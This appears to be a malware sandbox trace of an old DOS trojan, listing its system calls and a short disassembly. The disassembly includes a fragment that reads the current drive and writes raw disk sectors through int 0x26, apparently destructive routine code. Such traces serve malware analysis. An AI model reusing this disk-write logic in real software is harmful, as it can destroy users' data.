Sample viewer

vx.netlux.org/Trojan.DOS.307

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:07.732280411Z 71 PC: 12a5f | Get current directory
2018-12-17T22:32:07.743877905Z 26 PC: 12a67 | Set disk transfer address
2018-12-17T22:32:07.747797943Z 78 PC: 12a72 | Find first file
2018-12-17T22:32:07.752818452Z 59 PC: 12b19 | Change current directory
2018-12-17T22:32:07.763498604Z 44 PC: 12b22 | Get time 0x12b22: mov ah, 0x19
0x12b24: int 0x21
0x12b26: inc al
0x12b28: xor dh, dh
0x12b2a: mov cx, 1
0x12b2d: lea bx, word ptr [bp + 0x233]
0x12b31: int 0x26
0x12b33: jmp 0x12b01
0x12b35: jmp 0x12b38
0x12b38: inc si
0x12b39: push bp
0x12b3a: sub ch, byte ptr [0x6f63]
0x12b3e: insw word ptr es:[di], dx
0x12b3f: add ch, cl
0x12b41: and byte ptr [bx + si], al
0x12b43: add byte ptr [bx + si], al
0x12b45: add byte ptr cs:[bx + si], al
0x12b49: add byte ptr [bx + si], al
0x12b4b: add byte ptr [bx + si], al
0x12b4d: add byte ptr [bx + si], al
2018-12-17T22:32:07.766227081Z 25 PC: 12b26 | Get default drive